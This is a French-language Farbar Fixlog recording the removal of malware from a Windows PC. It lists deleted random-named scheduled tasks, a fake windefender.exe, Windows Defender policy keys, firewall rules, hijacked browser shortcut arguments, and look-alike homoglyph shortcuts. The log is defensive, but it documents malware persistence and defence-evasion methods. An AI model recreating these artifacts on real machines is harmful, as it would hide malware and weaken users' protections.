HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\reQGtPgibmNDB2 => impossible à supprimer. Accès refusé.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5BC9C638-C77A-45FD-8C48-5E256F4EC9DD} => non trouvé(e)
"C:\Windows\System32\Tasks\vnKUActWDSalGNfrR2" => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\vnKUActWDSalGNfrR2 => impossible à supprimer. Accès refusé.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8B42235A-108E-4ACA-9E97-433835655799} => non trouvé(e)
"C:\Windows\System32\Tasks\WAOtgPBGflHZLCaeTGs2" => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WAOtgPBGflHZLCaeTGs2 => impossible à supprimer. Accès refusé.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{A2902D70-1092-4EE7-8A75-2E887ADA18BF} => impossible à supprimer. Accès refusé.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A2902D70-1092-4EE7-8A75-2E887ADA18BF} => impossible à supprimer. Accès refusé.
C:\Windows\System32\Tasks\ScheduledUpdate => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate => impossible à supprimer. Accès refusé.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CE6C29DB-B07A-4EBA-BA79-CBFD1FFEE851} => non trouvé(e)
"C:\Windows\System32\Tasks\LookupPro" => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LookupPro => impossible à supprimer. Accès refusé.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F77B0082-9C92-4B87-AA72-632163F4ADBA} => non trouvé(e)
"C:\Windows\System32\Tasks\cvyVeCGCBGMaCol2" => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\cvyVeCGCBGMaCol2 => impossible à supprimer. Accès refusé.
"C:\Users\samy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Eхplоrеr.lnk" => non trouvé(e)
"C:\Users\samy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоogle Сhromе.lnk" => non trouvé(e)
"C:\Users\samy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Мozilla Firеfoх.lnk" => non trouvé(e)
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firеfох.lnk" => non trouvé(e)
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gооgle Сhrоme.lnk" => non trouvé(e)
"C:\Users\Public\Desktop\Firеfox.lnk" => non trouvé(e)
"C:\Users\Public\Desktop\Gоogle Chrоme.lnk" => non trouvé(e)
C:\Users\samy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => Raccourci argument supprimé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => Raccourci argument supprimé(es) avec succès
C:\Users\Public\Desktop\Google Chrome.lnk => Raccourci argument supprimé(es) avec succès
"HKU\S-1-5-21-908308729-834498892-2167088775-1001\Software\Classes\regfile" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D099E827-AEBF-4628-B0A9-FA0D3E833BF1}" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{7EAF4AFD-4181-4665-8758-EE59B9E1DDBF}" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3FE0B220-1FD6-4145-B0B3-362CB62E7E36}" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{969AE61B-22A7-4853-8C84-AC1B73ECB908}" => supprimé(es) avec succès

=========== EmptyTemp: ==========

BITS transfer queue => 9461760 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 96277101 B
Java, Flash, Steam htmlcache => 4856 B
Windows/system/drivers => 7181270 B
Edge => 286034534 B
Chrome => 398071136 B
Firefox => 391038837 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 4764 B
LocalService => 0 B
NetworkService => 6274896 B
NetworkService => 0 B
samy => 1352865525 B

RecycleBin => 2636009 B
EmptyTemp: => 2.4 GB données temporaires supprimées.

================================

Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 02-08-2018 12:13:59)

C:\Windows\windefender.exe => déplacé(es) avec succès

Résultats de la suppression planifiée des clés après redémarrage:

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => impossible à supprimer, clé était peut-être protégé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\zleDohIUJuBRcb" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1E029591-9CB5-4A7E-BF1E-6C3A1883B3AE}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1E029591-9CB5-4A7E-BF1E-6C3A1883B3AE}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\reQGtPgibmNDB2" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\vnKUActWDSalGNfrR2" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WAOtgPBGflHZLCaeTGs2" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{A2902D70-1092-4EE7-8A75-2E887ADA18BF}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A2902D70-1092-4EE7-8A75-2E887ADA18BF}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LookupPro" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\cvyVeCGCBGMaCol2" => supprimé(es) avec succès

==== Fin de Fixlog 12:14:00 ====